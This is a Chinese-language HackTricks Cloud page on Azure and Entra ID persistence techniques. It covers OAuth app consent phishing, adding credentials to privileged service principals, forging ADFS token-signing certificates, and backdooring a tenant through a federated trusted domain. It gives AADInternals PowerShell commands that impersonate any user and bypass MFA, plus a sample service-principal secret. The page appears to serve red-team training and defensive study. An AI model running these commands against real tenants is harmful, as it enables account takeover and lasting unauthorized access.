Az - Persistence

Tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术：HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

• 查看 订阅计划!
• 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
• 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

OAuth 应用程序

默认情况下，任何用户都可以在 Entra ID 中注册应用程序。因此，您可以注册一个需要高影响权限的应用程序（仅针对目标租户），并获得管理员同意（如果您是管理员，则批准它） - 例如代表用户发送邮件、角色管理等。这将使我们能够 执行网络钓鱼攻击，如果成功，将非常 有成效。

此外，您还可以接受该应用程序作为您的用户，以保持对其的访问。

应用程序和服务主体

凭借应用程序管理员、GA 或具有 microsoft.directory/applications/credentials/update 权限的自定义角色的权限，我们可以向现有应用程序添加凭据（密钥或证书）。

可以 针对具有高权限的应用程序 或 添加具有高权限的新应用程序。

一个有趣的角色是 特权身份验证管理员角色，因为它允许 重置 全局管理员的密码。

此技术还允许 绕过 MFA。

$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a

• 对于基于证书的身份验证

Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>

Federation - Token Signing Certificate

拥有 DA 权限 的本地 AD，可以创建和导入 新的 Token 签名 和 Token 解密证书，这些证书具有很长的有效期。这将允许我们 以任何用户身份登录，前提是我们知道其 ImuutableID。

在 ADFS 服务器上以 DA 身份运行以下命令 来创建新证书（默认密码 ‘AADInternals’），将其添加到 ADFS，禁用自动滚动并重启服务：

New-AADIntADFSSelfSignedCertificates

然后，使用 Azure AD 更新证书信息：

Update-AADIntADFSFederationSettings -Domain cyberranges.io

Federation - Trusted Domain

拥有租户的 GA 权限，可以添加一个新域（必须经过验证），将其身份验证类型配置为联邦，并将域配置为信任特定证书（以下命令中的 any.sts）和颁发者：

# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io

# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID

# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true

参考

• https://aadinternalsbackdoor.azurewebsites.net/

Tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术：HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

• 查看 订阅计划!
• 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
• 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。